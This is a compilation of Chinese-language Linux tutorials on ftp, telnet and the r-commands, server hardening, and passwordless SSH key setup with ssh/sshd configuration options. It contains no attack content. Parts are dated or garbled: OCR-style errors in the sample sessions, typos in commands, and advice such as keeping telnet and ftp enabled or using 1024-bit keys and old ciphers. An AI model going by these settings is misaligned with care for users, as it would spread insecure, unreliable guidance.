mput命令一次發送多個本地文件，mput命令的一般格式為： mput 文件名列表 使用用空格分隔的或帶通配符的文件名列表來指定要發送的文件。對其中的每個文件都要求用戶確認是否發送。 改變文件傳輸模式 默認情況下，ftp按ASCII模式傳輸文件，用戶也可以指定其他模式。ascii和brinary命令的功能是設置傳輸的模式。用ASCII模式傳輸文件對純文本是非常好的，但為避免對二進制文件的破壞，用戶可以以二進制模式傳輸文件。 檢查傳輸狀態 傳輸大型文件時，可能會發現讓ftp提供關於傳輸情況的反饋信息是非常有用的。hash命令使ftp在每次傳輸完數據緩沖區中的數據後，就在屏幕上列印一個#字元。本命令在發送和接收文件時都可以使用。 ftp中的本地命令 當您使用ftp時，字元「!」用於向本地機上的命令shell傳送一個命令。如果用戶處在ftp會話中，需要shell做某些事，就很有用。例如用戶要建立一個目錄來保存接收到的文件。如果輸入!mkdir new_dir，那麼Linux就在用戶當前的本地目錄中創建一個名為new_dir 的目錄。

從遠程機grunthos下載二進制數據文件的典型對話過程如下：
$ ftp grunthos Connected to grunthos 220 grunthos ftp server Name （grunthos:pc）: anonymous 33l Guest login ok, send your complete e-mail address as password. Password: 230 Guest 1ogin ok, access restrictions apply. Remote system type is UNIX. ftp > cd pub 250 CWD command successful. ftp > ls 200 PORT command successful. l50 opening ASCII mode data connection for /bin/1s. total ll4 rog1 rog2 226 Transfer comp1ete . ftp > binary 200 type set to I. ftp > hash Hash mark printing on （1024 bytes/hash mark）. ftp > get rog1 200 PORT command successfu1. 150 opening BINARY mode data connection for rogl （l4684 bytes）. # # # # # # # # # # # # # 226 Transfer complete. 14684 bytes received in 0.0473 secs （3e + 02 Kbytes/sec） ftp > quit 22l Goodbye.

使用telnet命令訪問遠程計算機
用戶使用telnet命令進行遠程登錄。該命令允許用戶使用telnet協議在遠程計算機之間進行通信，用戶可以通過網路在遠程計算機上登錄，就像登錄到本地機上執行命令一樣。 為了通過telnet登錄到遠程計算機上，必須知道遠程機上的合法用戶名和口令。雖然有些系統確實為遠程用戶提供登錄功能，但出於對安全的考慮，要限制來賓的操作許可權，因此，這種情況下能使用的功能是很少的。當允許遠程用戶登錄時，系統通常把這些用戶放在一個受限制的shell中，以防系統被懷有惡意的或不小心的用戶破壞。 用戶還可以使用telnet從遠程站點登錄到自己的計算機上，檢查電子郵件、編輯文件和運行程序，就像在本地登錄一樣。
但是，用戶只能使用基於終端的環境而不是X Wndows環境，telnet只為普通終端提供終端模擬，而不支持 X Wndow等圖形環境。 telnet命令的一般形式為： telnet 主機名/IP 其中「主機名/IP」是要連接的遠程機的主機名或IP地址。如果這一命令執行成功，將從遠程機上得到login：提示符。 使用telnet命令登錄的過程如下： $ telnet 主機名/IP 啟動telnet會話。 一旦telnet成功地連接到遠程系統上，就顯示登錄信息並提示用戶輸人用戶名和口令。如果用戶名和口令輸入正確，就能成功登錄並在遠程系統上工作。 在telnet提示符後面可以輸入很多命令，用來控制telnet會話過程，在telnet聯機幫助手冊中對這些命令有詳細的說明。

下面是一台Linux計算機上的telnet會話舉例：
$ telnet server. somewhere. com Trying 127.0.0.1… Connected to serve. somewhere. com. Escape character is \'?]\'. 「TurboLinux release 4. 0 （Colgate） kernel 2.0.18 on an I486 login: bubba password: Last login:Mon Nov l5 20:50:43 for localhost Linux 2. 0.6. （Posix）. server: ~$ server: ~$ logout Connection closed by foreign host $

用戶結束了遠程會話後，一定要確保使用logout命令退出遠程系統。然後telnet報告遠程會話被關閉，並返回到用戶的本地機的Shell提示符下。 r-系列命令 除ftp和telnet以外，還可以使用r-系列命令訪問遠程計算機和在網路上交換文件。 使用r-系列命令需要特別注意，因為如果用戶不小心，就會造成嚴重的安全漏洞。用戶發出一個r-系列命令後，遠程系統檢查名為/etc/hosts.equiv的文件，以查看用戶的主機是否列在這個文件中。如果它沒有找到用戶的主機，就檢查遠程機上同名用戶的主目錄中名為．rhosts的文件，看是否包括該用戶的主機。如果該用戶的主機包括在這兩個文件中的任何一個之中，該用戶執行r-系列命令就不用提供口令。

雖然用戶每次訪問遠程機時不用鍵入口令可能是非常方便的，但是它也可能會帶來嚴重的安全問題。我們建議用戶在建立/etc/hosts.equiv和.rhosts文件之前，仔細考慮r-命令隱含的安全問題。

rlogin命令
rlogin 是「remote login」（遠程登錄）的縮寫。該命令與telnet命令很相似，允許用戶啟動遠程系統上的交互命令會話。rlogin 的一般格式是：
rlogin [ -8EKLdx ] [ -e char ] [-k realm ] [ - l username ] host

一般最常用的格式是： rlogin host 該命令中各選項的含義為：
-8 此選項始終允許8位輸入數據通道。該選項允許發送格式化的ANSI字元和其他的特殊代碼。如果不用這個選項，除非遠端的終止和啟動字元不是或，否則就去掉奇偶校驗位。
-E 停止把任何字元當作轉義字元。當和-8選項一起使用時，它提供一個完全的透明連接。
-K 關閉所有的Kerberos確認。只有與使用Kerberos 確認協議的主機連接時才使用這個選項。
-L 允許rlogin會話在litout模式中運行。要了解更多信息，請查閱tty聯機幫助。
-d 打開與遠程主機進行通信的TCP sockets的socket調試。要了解更多信息，請查閱setsockopt的聯機幫助。
-e 為rlogin會話設置轉義字元，默認的轉義字元是「~」，用戶可以指定一個文字字元或一個\\nnn形式的八進制數。
-k 請求rlogin獲得在指定區域內的遠程主機的Kerberos許可，而不是獲得由krb_realmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos 許可。
-x 為所有通過rlogin會話傳送的數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。

rsh命令
rsh是「remote shell」（遠程 shell）的縮寫。 該命令在指定的遠程主機上啟動一個shell並執行用戶在rsh命令行中指定的命令。如果用戶沒有給出要執行的命令，rsh就用rlogin命令使用戶登錄到遠程機上。
rsh命令的一般格式是：
rsh [-Kdnx] [-k realm] [-l username] host [command]
一般常用的格式是：
rsh host [command ]
command可以是從shell提示符下鍵人的任何Linux命令。
rsh命令中各選項的含義如下：
-K 關閉所有的Kerbero確認。該選項只在與使用Kerbero確認的主機連接時才使用。
-d 打開與遠程主機進行通信的TCP sockets的socket調試。要了解更多的信息，請查閱setsockopt的聯機幫助。
-k 請求rsh獲得在指定區域內的遠程主機的Kerberos許可，而不是獲得由krb_relmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos許可。
-l 預設情況下，遠程用戶名與本地用戶名相同。本選項允許指定遠程用戶名，如果指定了遠程用戶名，則使用Kerberos 確認，與在rlogin命令中一樣。
-n 重定向來自特殊設備/dev/null的輸入。
-x 為傳送的所有數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。 Linux把標准輸入放入rsh命令中,並把它拷貝到要遠程執行的命令的標准輸入中。它把遠程命令的標准輸出拷貝到rsh的標准輸出中。它還把遠程標准錯誤拷貝到本地標准錯誤文件中。任何退出、中止和中斷信號都被送到遠程命令中。當遠程命令終止了，rsh也就終止了。

rcp命令
rcp代表「remote file 」（遠程文件拷貝）。該命令用於在計算機之間拷貝文件。
rcp命令有兩種格式。第一種格式用於文件到文件的拷貝；第二種格式用於把文件或目錄拷貝到另一個目錄中。
rcp命令的一般格式是：
rcp [-px] [-k realm] file1 file2 rcp [-px] [-r] [-k realm] file
directory 每個文件或目錄參數既可以是遠程文件名也可以是本地文件名。遠程文件名具有如下形式：rname@rhost：path，其中rname是遠程用戶名，rhost是遠程計算機名，path是這個文件的路徑。
rcp命令的各選項含義如下：
-r 遞歸地把源目錄中的所有內容拷貝到目的目錄中。要使用這個選項，目的必須是一個目錄。
-p 試圖保留源文件的修改時間和模式，忽略umask。
-k 請求rcp獲得在指定區域內的遠程主機的Kerberos 許可，而不是獲得由krb_relmofhost（3）確定的遠程主機區域內的遠程主機的Kerberos許可。
-x 為傳送的所有數據打開DES加密。這會影響響應時間和CPU利用率，但是可以提高安全性。 如果在文件名中指定的路徑不是完整的路徑名，那麼這個路徑被解釋為相對遠程機上同名用戶的主目錄。如果沒有給出遠程用戶名，就使用當前用戶名。如果遠程機上的路徑包含特殊shell字元，需要用反斜線（\\）、雙引號（」）或單引號（』）括起來，使所有的shell元字元都能被遠程地解釋。 需要說明的是，rcp不提示輸入口令，它通過rsh命令來執行拷貝。 - Turbolinux 提供稿件

Ⅷ Linux伺服器的安全防護都有哪些措施

隨著開源系統Linux的盛行，其在大中型企業的應用也在逐漸普及，很多企業的應用服務都是構築在其之上，例如Web服務、資料庫服務、集群服務等等。因此，Linux的安全性就成為了企業構築安全應用的一個基礎，是重中之重，如何對其進行安全防護是企業需要解決的一個基礎性問題，基於此，本文將給出十大企業級Linux伺服器安全防護的要點。 1、強化：密碼管理 設定登錄密碼是一項非常重要的安全措施，如果用戶的密碼設定不合適，就很容易被破譯，尤其是擁有超級用戶使用許可權的用戶，如果沒有良好的密碼，將給系統造成很大的安全漏洞。 目前密碼破解程序大多採用字典攻擊以及暴力攻擊手段，而其中用戶密碼設定不當，則極易受到字典攻擊的威脅。很多用戶喜歡用自己的英文名、生日或者賬戶等信息來設定密碼，這樣，黑客可能通過字典攻擊或者是社會工程的手段來破解密碼。所以建議用戶在設定密碼的過程中，應盡量使用非字典中出現的組合字元，並且採用數字與字元相結合、大小寫相結合的密碼設置方式，增加密碼被黑客破解的難度。而且，也可以使用定期修改密碼、使密碼定期作廢的方式，來保護自己的登錄密碼。 在多用戶系統中，如果強迫每個用戶選擇不易猜出的密碼，將大大提高系統的安全性。但如果passwd程序無法強迫每個上機用戶使用恰當的密碼，要確保密碼的安全度，就只能依靠密碼破解程序了。實際上，密碼破解程序是黑客工具箱中的一種工具，它將常用的密碼或者是英文字典中所有可能用來作密碼的字都用程序加密成密碼字，然後將其與Linux系統的/etc/passwd密碼文件或/etc/shadow影子文件相比較，如果發現有吻合的密碼，就可以求得明碼了。在網路上可以找到很多密碼破解程序，比較有名的程序是crack和john the ripper.用戶可以自己先執行密碼破解程序，找出容易被黑客破解的密碼，先行改正總比被黑客破解要有利。 2、限定：網路服務管理 早期的Linux版本中，每一個不同的網路服務都有一個服務程序(守護進程，Daemon)在後台運行，後來的版本用統一的/etc/inetd伺服器程序擔此重任。Inetd是Internetdaemon的縮寫，它同時監視多個網路埠，一旦接收到外界傳來的連接信息，就執行相應的TCP或UDP網路服務。由於受inetd的統一指揮，因此Linux中的大部分TCP或UDP服務都是在/etc/inetd.conf文件中設定。所以取消不必要服務的第一步就是檢查/etc/inetd.conf文件，在不要的服務前加上“#”號。 一般來說，除了http、smtp、telnet和ftp之外，其他服務都應該取消，諸如簡單文件傳輸協議tftp、網路郵件存儲及接收所用的imap/ipop傳輸協議、尋找和搜索資料用的gopher以及用於時間同步的daytime和time等。還有一些報告系統狀態的服務，如finger、efinger、systat和netstat等，雖然對系統查錯和尋找用戶非常有用，但也給黑客提供了方便之門。例如，黑客可以利用finger服務查找用戶的電話、使用目錄以及其他重要信息。因此，很多Linux系統將這些服務全部取消或部分取消，以增強系統的安全性。Inetd除了利用/etc/inetd.conf設置系統服務項之外，還利用/etc/services文件查找各項服務所使用的埠。因此，用戶必須仔細檢查該文件中各埠的設定，以免有安全上的漏洞。 在後繼的Linux版本中(比如Red Hat Linux7.2之後)，取而代之的是採用xinetd進行網路服務的管理。 當然，具體取消哪些服務不能一概而論，需要根據實際的應用情況來定，但是系統管理員需要做到心中有數，因為一旦系統出現安全問題，才能做到有步驟、有條不紊地進行查漏和補救工作，這點比較重要。 3、嚴格審計：系統登錄用戶管理 在進入Linux系統之前，所有用戶都需要登錄，也就是說，用戶需要輸入用戶賬號和密碼，只有它們通過系統驗證之後，用戶才能進入系統。 與其他Unix操作系統一樣，Linux一般將密碼加密之後，存放在/etc/passwd文件中。Linux系統上的所有用戶都可以讀到/etc/passwd文件，雖然文件中保存的密碼已經經過加密，但仍然不太安全。因為一般的用戶可以利用現成的密碼破譯工具，以窮舉法猜測出密碼。比較安全的方法是設定影子文件/etc/shadow，只允許有特殊許可權的用戶閱讀該文件。 在Linux系統中，如果要採用影子文件，必須將所有的公用程序重新編譯，才能支持影子文件。這種方法比較麻煩，比較簡便的方法是採用插入式驗證模塊(PAM)。很多Linux系統都帶有Linux的工具程序PAM，它是一種身份驗證機制，可以用來動態地改變身份驗證的方法和要求，而不要求重新編譯其他公用程序。這是因為PAM採用封閉包的方式，將所有與身份驗證有關的邏輯全部隱藏在模塊內，因此它是採用影子檔案的最佳幫手。 此外，PAM還有很多安全功能：它可以將傳統的DES加密方法改寫為其他功能更強的加密方法，以確保用戶密碼不會輕易地遭人破譯;它可以設定每個用戶使用電腦資源的上限;它甚至可以設定用戶的上機時間和地點。 Linux系統管理人員只需花費幾小時去安裝和設定PAM，就能大大提高Linux系統的安全性，把很多攻擊阻擋在系統之外。 4、設定：用戶賬號安全等級管理 除密碼之外，用戶賬號也有安全等級，這是因為在Linux上每個賬號可以被賦予不同的許可權，因此在建立一個新用戶ID時，系統管理員應該根據需要賦予該賬號不同的許可權，並且歸並到不同的用戶組中。 在Linux系統中的部分文件中，可以設定允許上機和不允許上機人員的名單。其中，允許上機人員名單在/etc/hosts.allow中設置，不允許上機人員名單在/etc/hosts.deny中設置。此外，Linux將自動把允許進入或不允許進入的結果記錄到/var/log/secure文件中，系統管理員可以據此查出可疑的進入記錄。 每個賬號ID應該有專人負責。在企業中，如果負責某個ID的職員離職，管理員應立即從系統中刪除該賬號。很多入侵事件都是借用了那些很久不用的賬號。 在用戶賬號之中，黑客最喜歡具有root許可權的賬號，這種超級用戶有權修改或刪除各種系統設置，可以在系統中暢行無阻。因此，在給任何賬號賦予root許可權之前，都必須仔細考慮。 Linux系統中的/etc/securetty文件包含了一組能夠以root賬號登錄的終端機名稱。例如，在RedHatLinux系統中，該文件的初始值僅允許本地虛擬控制台(rtys)以root許可權登錄，而不允許遠程用戶以root許可權登錄。最好不要修改該文件，如果一定要從遠程登錄為root許可權，最好是先以普通賬號登錄，然後利用su命令升級為超級用戶。 5、謹慎使用：“r系列”遠程程序管理 在Linux系統中有一系列r字頭的公用程序，比如rlogin，rcp等等。它們非常容易被黑客用來入侵我們的系統，因而非常危險，因此絕對不要將root賬號開放給這些公用程序。由於這些公用程序都是用。rhosts文件或者hosts.equiv文件核准進入的，因此一定要確保root賬號不包括在這些文件之內。 由於r等遠程指令是黑客們用來攻擊系統的較好途徑，因此很多安全工具都是針對這一安全漏洞而設計的。例如，PAM工具就可以用來將r字頭公用程序有效地禁止掉，它在/etc/pam.d/rlogin文件中加上登錄必須先核準的指令，使整個系統的用戶都不能使用自己home目錄下的。rhosts文件。 6、限制：root用戶許可權管理 Root一直是Linux保護的重點，由於它權力無限，因此最好不要輕易將超級用戶授權出去。但是，有些程序的安裝和維護工作必須要求有超級用戶的許可權，在這種情況下，可以利用其他工具讓這類用戶有部分超級用戶的許可權。sudo就是這樣的工具。 sudo程序允許一般用戶經過組態設定後，以用戶自己的密碼再登錄一次，取得超級用戶的許可權，但只能執行有限的幾個指令。例如，應用sudo後，可以讓管理磁帶備份的管理人員每天按時登錄到系統中，取得超級用戶許可權去執行文檔備份工作，但卻沒有特權去作其他只有超級用戶才能作的工作。 sudo不但限制了用戶的許可權，而且還將每次使用sudo所執行的指令記錄下來，不管該指令的執行是成功還是失敗。在大型企業中，有時候有許多人同時管理Linux系統的各個不同部分，每個管理人員都有用sudo授權給某些用戶超級用戶許可權的能力，從sudo的日誌中，可以追蹤到誰做了什麼以及改動了系統的哪些部分。 值得注意的是，sudo並不能限制所有的用戶行為，尤其是當某些簡單的指令沒有設置限定時，就有可能被黑客濫用。例如，一般用來顯示文件內容的/etc/cat指令，如果有了超級用戶的許可權，黑客就可以用它修改或刪除一些重要的文件。 7、追蹤黑客蹤跡：日誌管理 當用戶仔細設定了各種與Linux相關的配置(最常用日誌管理選項)，並且安裝了必要的安全防護工具之後，Linux操作系統的安全性的確大為提高，但是卻並不能保證防止那些比較熟練的網路黑客的入侵。 在平時，網路管理人員要經常提高警惕，隨時注意各種可疑狀況，並且按時檢查各種系統日誌文件，包括一般信息日誌、網路連接日誌、文件傳輸日誌以及用戶登錄日誌等。在檢查這些日誌時，要注意是否有不合常理的時間記載。例如： 正常用戶在半夜三更登錄; 不正常的日誌記錄，比如日誌只記錄了一半就切斷了，或者整個日誌文件被刪除了; 用戶從陌生的網址進入系統; 因密碼錯誤或用戶賬號錯誤被擯棄在外的日誌記錄，尤其是那些一再連續嘗試進入失敗，但卻有一定模式的試錯法; 非法使用或不正當使用超級用戶許可權su的指令; 重新開機或重新啟動各項服務的記錄。 上述這些問題都需要系統管理員隨時留意系統登錄的用戶狀況以及查看相應日誌文件，許多背離正常行為的蛛絲馬跡都應當引起高度注意。 8、橫向擴展：綜合防禦管理 防火牆、IDS等防護技術已經成功地應用到網路安全的各個領域，而且都有非常成熟的產品。 在Linux系統來說，有一個自帶的Netfilter/Iptables防火牆框架，通過合理地配置其也能起到主機防火牆的功效。在Linux系統中也有相應的輕量級的網路入侵檢測系統Snort以及主機入侵檢測系統LIDS(Linux Intrusion Detection System)，使用它們可以快速、高效地進行防護。 需要提醒注意的是：在大多數的應用情境下，我們需要綜合使用這兩項技術，因為防火牆相當於安全防護的第一層，它僅僅通過簡單地比較IP地址/埠對來過濾網路流量，而IDS更加具體，它需要通過具體的數據包(部分或者全部)來過濾網路流量，是安全防護的第二層。綜合使用它們，能夠做到互補，並且發揮各自的優勢，最終實現綜合防禦。 9、評測：漏洞追蹤及管理 Linux作為一種優秀的開源軟體，其自身的發展也日新月異，同時，其存在的問題也會在日後的應用中慢慢暴露出來。黑客對新技術的關注從一定程度上來說要高於我們防護人員，所以要想在網路攻防的戰爭中處於有利地位，保護Linux系統的安全，就要求我們要保持高度的警惕性和對新技術的高度關注。用戶特別是使用Linux作為關鍵業務系統的系統管理員們，需要通過Linux的一些權威網站和論壇上盡快地獲取有關該系統的一些新技術以及一些新的系統漏洞的信息，進行漏洞掃描、滲透測試等系統化的相關配套工作，做到防範於未然，提早行動，在漏洞出現後甚至是出現前的最短時間內封堵系統的漏洞，並且在實踐中不斷地提高安全防護的技能，這樣才是一個比較的解決辦法和出路。 10、保持更新：補丁管理 Linux作為一種優秀的開源軟體，其穩定性、安全性和可用性有極為可靠的保證，世界上的Linux高手共同維護著個優秀的產品，因而起流通渠道很多，而且經常有更新的程序和系統補丁出現，因此，為了加強系統安全，一定要經常更新系統內核。 Kernel是Linux操作系統的核心，它常駐內存，用於載入操作系統的其他部分，並實現操作系統的基本功能。由於Kernel控制計算機和網路的各種功能，因此，它的安全性對整個系統安全至關重要。早期的Kernel版本存在許多眾所周知的安全漏洞，而且也不太穩定，只有2.0.x以上的版本才比較穩定和安全(一般說來，內核版本號為偶數的相對穩定，而為奇數的則一般為測試版本，用戶們使用時要多留意)，新版本的運行效率也有很大改觀。在設定Kernel的功能時，只選擇必要的功能，千萬不要所有功能照單全收，否則會使Kernel變得很大，既佔用系統資源，也給黑客留下可乘之機。 在Internet上常常有最新的安全修補程序，Linux系統管理員應該消息靈通，經常光顧安全新聞組，查閱新的修補程序。

Ⅸ linux怎麼遠程執行另一台linux機器上的shell文件

現在兩台及器間設這ssh的不用密碼的連接，設置共有和私有的密鑰

user1 (客戶端A) user2（服務版端B）
產生密鑰
user1# ssh-keygen -t rsa
user1# ls .ss
is_rsa id_rsa.pub
私鑰權 公鑰=============》導入
user1#ssh--id -i .ssh/id_rsa.pub user2@B的IP
user1#ssh user2@B的ip
在A機器上：
ssh B機器IP <<EOF
/opt/m.sh
exit
EOF

其實這也是在B上執行的，只是在內部執行的而已

Ⅹ 如何配置linux系統信任關系

在Linux伺服器之間建立信任關系，是很多線上服務系統的基礎性工作，這樣能便於程序在多台伺服器之間自動傳輸數據，或者方便用戶不輸入密碼就可以在不同的主機間完成登錄或者各種操作。

網上關於建立Linux信任關系（ssh trust）的中文文章有一些，但是寫得都不太詳細，這里匯總了方方面面的資料，把多機信任關系建立方法說說清楚（文/陳運文）

一 建立信任關系的基本操作

基本場景是想從一台Server伺服器直接登錄另一台，或者將Server伺服器的數據不需密碼驗證直接拷貝至Client伺服器，以下我們簡稱Server伺服器為S（待發送的數據文件在這台伺服器上），Client服務為C，信任關系的最簡單操作方法如下：

1 在S伺服器上，進入當前用戶根目錄下的隱藏目錄 .ssh，命令如下：

cd ~/.ssh

（註：目錄名前的點好」.」表示該文件夾是一個特殊的隱藏文件夾，ls命令下默認是看不到的，通過 ls –a 命令觀察到）

2 生成S伺服器的私鑰和公鑰：

ssh-keygen -t rsa

（註：rsa是一種加密演算法的名稱，此處也可以使用dsa，關於rsa和dsa演算法的介紹可見本文後半章節）

ssh-keygen生成密鑰用於信任關系生成

-此時會顯示Generating public/private key pair. 並提示生成的公鑰私鑰文件的存放路徑和文件名，默認是放在 /home/username/.ssh/id_rsa 這樣的文件里的，通常不用改，回車就可以

然後Enter passphrase(empty for no passphrase): 通常直接回車，默認不需要口令

Enter same passphrase again: 也直接回車

然後會顯式密鑰fingerprint生成好的提示，並給出一個RSA加密協議的方框圖形。此時在.ssh目錄下ls，就可以看到生成好的私鑰文件id_rsa和公鑰文件id_rsa.pub了

以下是各種補充說明：

注1：如果此時提示 id_rsaalready exists，Overwrite(y/n) 則說明之前已經有人建好了密鑰，此時選擇n 忽略本次操作就行，可以直接用之前生成好的文件；當然選y覆蓋一下也無妨

注2：公鑰用於加密，它是向所有人公開的（pub是公開的單詞public的縮寫）；私鑰用於解密，只有密文的接收者持有。

3 在Server伺服器上載入私鑰文件

仍然在.ssh目錄下，執行命令：

ssh-add id_rsa

系統如果提示：Identity added: id_rsa (id_rsa) 就表明載入成功了

下面有幾個異常情況處理：

–如果系統提示：could not open a connection to your authentication agent

則需要執行一下命令：

ssh-agent bash

然後再執行上述的ssh-add id_rsa命令

–如果系統提示id_rsa: No such file or directory

這是系統無法找到私鑰文件id_rsa，需要看看當前路徑是不是不在.ssh目錄，或者私鑰文件改了名字，例如如果建立的時候改成 aa_rsa，則這邊命令中也需要相應改一下

-如果系統提示 command not found，那肯定是你命令敲錯字元了J

-提示Agent admitted failure to sign using the key，私鑰沒有載入成功，重試ssh-add

-注意id_rsa/id_rsa.pub文件不要刪除，存放在.ssh目錄下

4 把公鑰拷貝至Client伺服器上

很簡單，例如 scp id_rsa.pub [email protected]:~

5 ssh登錄到Client伺服器上，然後在Client伺服器上，把公鑰的內容追加到authorized_keys文件末尾（這個文件也在隱藏文件夾.ssh下，沒有的話可以建立，沒有關系）

cat id_rsa.pub >> ~/.ssh/authorized_keys

以下是各種補充說明，遇到問題時可以參考：

注1：這里不推薦用文件覆蓋的方式，有些教程直接scp id_rsa.pub 到Client伺服器的authorized_keys文件，會導致之前建的其他信任關系的數據被破壞，追加到末尾是更穩妥的方式；

注2： cat 完以後，Client伺服器上剛才拷貝過來的id_rsa.pub文件就不需要了，可以刪除或移動到其它地方）

注3：ssh-keygen 命令通過-b參數可以指定生成的密鑰文件的長度，如果不指定則默認為1024，如果ssh-keygen –b 4096（最長4096），則加密程度提高，但是生成和驗證時間會增加。對一般的應用來說，默認長度已經足夠勝任了。如果是rsa加密方式，那麼最短長度為768 byte

注4：authorized_keys文件的許可權問題。如果按上述步驟建立關系後，仍然要驗證密碼，並且沒有其他報錯，那麼需要檢查一下authorized_keys文件的許可權，需要作下修改： chmod g-w authorized_keys

OK，現在試試在Server端拷貝一個文件到Client伺服器，應該無需交互直接就傳過去了。

但是此時從Client傳數據到Server伺服器，仍然是需要密碼驗證的。如果需要兩台伺服器間能直接互傳數據，則反過來按上述步驟操作一下就可以了

二 刪除伺服器間信任關系的方法

如果想取消兩台伺服器之間的信任關系，直接刪除公鑰或私鑰是沒有用的，需要在Client伺服器上，打開 ~/.ssh/ authorized_keys 文件，找到對應的伺服器的公鑰欄位並刪除

每個段落的開頭是ssh-rsa字樣，段尾是Server伺服器的帳號和ip（如下圖紅框），需要細心的找一下後刪除整段

密鑰文件內容和刪除Linux伺服器間信任關系的方法

三 各種可能遇到的情況和處理方法

–提示 port 22: Connection refused

可能的原因：沒有正確安裝最新的openssh-server，安裝方法如下

sudo apt-get install openssh-server

不支持apt安裝的，可以手工下載：

wget ftp.ssh.com/pub/ssh/ssh-3.2.9.1.tar.gz

–關於目錄和文件的許可權設置

.ssh目錄的許可權必須是700，同時本機的私鑰的許可權必須設置成600：

chmod 600 id_rsa

否則ssh伺服器會拒絕登錄

四 關於RSA和DSA加密演算法

在ssh-keygen命令中，-t參數後指定的是加密演算法，可以選擇rsa或者dsa

RSA 取名自演算法的三位提出者Ron Rivest, Adi Shamir, and Leonard Adleman的姓名首字母，作為一種非對稱加密演算法，RSA的安全性基於及其困難的大整數分解（兩個素數的乘積的還原問題）。關於RSA演算法原理的文章很多，感興趣的朋友可以找來讀一讀。

DSA = Digital Signature Algorithm，基於有限域離散對數難題，是Schnorr和ElGamal簽名演算法的變種，一般用於數字簽名和認證，被美國標准局（NIST）採納為數字簽名標准DSS（Digital Signature Standard），based on discrete logarithms computation.

DES = Digital Encryption Standard. Obsolete standard.

RSA演算法好在網路容易實現密鑰管理,便進行數字簽名,演算法復雜,加/解速度慢,採用非對稱加密。在實際用於信任關系建立中，這兩種方法的差異很微小，可以挑選其一使用。

五 關於SSH協議的介紹

SSH全稱Secure SHell，顧名思義就是非常安全的shell的意思，SSH協議是IETF（Internet Engineering Task Force）的Network Working Group所制定的一種協議。SSH的主要目的是用來取代傳統的telnet和R系列命令（rlogin,rsh,rexec等）遠程登陸和遠程執行命令的工具，實現對遠程登陸和遠程執行命令加密。防止由於網路監聽而出現的密碼泄漏，對系統構成威脅。

ssh協議目前有SSH1和SSH2，SSH2協議兼容SSH1。目前實現SSH1和SSH2協議的主要軟體有OpenSSH和SSH Communications Security Corporation公司的SSH Communications 軟體。前者是OpenBSD組織開發的一款免費的SSH軟體，後者是商業軟體，因此在linux、FreeBSD、OpenBSD、NetBSD等免費類UNIX系統種，通暢都使用OpenSSH作為SSH協議的實現軟體。因此，本文重點介紹一下OpenSSH的使用。需要注意的是OpenSSH和SSH Communications的登陸公鑰/私鑰的格式是不同的，如果想用SSH Communications產生的私鑰/公鑰對來登入到使用OpenSSH的linux系統需要對公鑰/私鑰進行格式轉換。

第一次登陸後，ssh就會把登陸的ssh指紋存放在用戶home目錄的.ssh目錄的know_hosts文件中，如果遠程系統重裝過系統，ssh指紋已經改變，你需要把 .ssh 目錄下的know_hosts中的相應指紋刪除，再登陸回答yes，方可登陸。請注意.ssh目錄是開頭是」.」的隱藏目錄，需要ls –a參數才能看到。而且這個目錄的許可權必須是700,並且用戶的home目錄也不能給其他用戶寫許可權，否則ssh伺服器會拒絕登陸。如果發生不能登陸的問題，請察看伺服器上的日誌文件/var/log/secure。通常能很快找到不能登陸的原因。

六 關於ssh_config和sshd_config文件配置的說明

/etc/ssh/ssh_config:

Host *

選項「Host」只對能夠匹配後面字串的計算機有效。「*」表示所有的計算機。

ForwardAgent no

「ForwardAgent」設置連接是否經過驗證代理（如果存在）轉發給遠程計算機。

ForwardX11 no

「ForwardX11」設置X11連接是否被自動重定向到安全的通道和顯示集（DISPLAY set）。

RhostsAuthentication no

「RhostsAuthentication」設置是否使用基於rhosts的安全驗證。

RhostsRSAAuthentication no

「RhostsRSAAuthentication」設置是否使用用RSA演算法的基於rhosts的安全驗證。

RSAAuthentication yes

「RSAAuthentication」設置是否使用RSA演算法進行安全驗證。

PasswordAuthentication yes

「PasswordAuthentication」設置是否使用口令驗證。

FallBackToRsh no

「FallBackToRsh」設置如果用ssh連接出現錯誤是否自動使用rsh。

UseRsh no

「UseRsh」設置是否在這台計算機上使用「rlogin/rsh」。

BatchMode no

「BatchMode」如果設為「yes」，passphrase/password（互動式輸入口令）的提示將被禁止。當不能互動式輸入口令的時候，這個選項對腳本文件和批處理任務十分有用。

CheckHostIP yes

「CheckHostIP」設置ssh是否查看連接到伺服器的主機的IP地址以防止DNS欺騙。建議設置為「yes」。

StrictHostKeyChecking no

「StrictHostKeyChecking」如果設置成「yes」，ssh就不會自動把計算機的密匙加入「$HOME/.ssh/known_hosts」文件，並且一旦計算機的密匙發生了變化，就拒絕連接。

IdentityFile ~/.ssh/identity

「IdentityFile」設置從哪個文件讀取用戶的RSA安全驗證標識。

Port 22

「Port」設置連接到遠程主機的埠。

Cipher blowfish

「Cipher」設置加密用的密碼。

EscapeChar ~

「EscapeChar」設置escape字元。

/etc/ssh/sshd_config:

Port 22

「Port」設置sshd監聽的埠號。

ListenAddress 192.168.1.1

「ListenAddress」設置sshd伺服器綁定的IP地址。

HostKey /etc/ssh/ssh_host_key

「HostKey」設置包含計算機私人密匙的文件。

ServerKeyBits 1024

「ServerKeyBits」定義伺服器密匙的位數。

LoginGraceTime 600

「LoginGraceTime」設置如果用戶不能成功登錄，在切斷連接之前伺服器需要等待的時間（以秒為單位）。

KeyRegenerationInterval 3600

「KeyRegenerationInterval」設置在多少秒之後自動重新生成伺服器的密匙（如果使用密匙）。重新生成密匙是為了防止用盜用的密匙解密被截獲的信息。

PermitRootLogin no

「PermitRootLogin」設置root能不能用ssh登錄。這個選項一定不要設成「yes」。

IgnoreRhosts yes

「IgnoreRhosts」設置驗證的時候是否使用「rhosts」和「shosts」文件。

IgnoreUserKnownHosts yes

「IgnoreUserKnownHosts」設置ssh daemon是否在進行RhostsRSAAuthentication安全驗證的時候忽略用戶的「$HOME/.ssh/known_hosts」

StrictModes yes

「StrictModes」設置ssh在接收登錄請求之前是否檢查用戶家目錄和rhosts文件的許可權和所有權。這通常是必要的，因為新手經常會把自己的目錄和文件設成任何人都有寫許可權。

X11Forwarding no

「X11Forwarding」設置是否允許X11轉發。

PrintMotd yes

「PrintMotd」設置sshd是否在用戶登錄的時候顯示「/etc/motd」中的信息。

SyslogFacility AUTH

「SyslogFacility」設置在記錄來自sshd的消息的時候，是否給出「facility code」。

LogLevel INFO

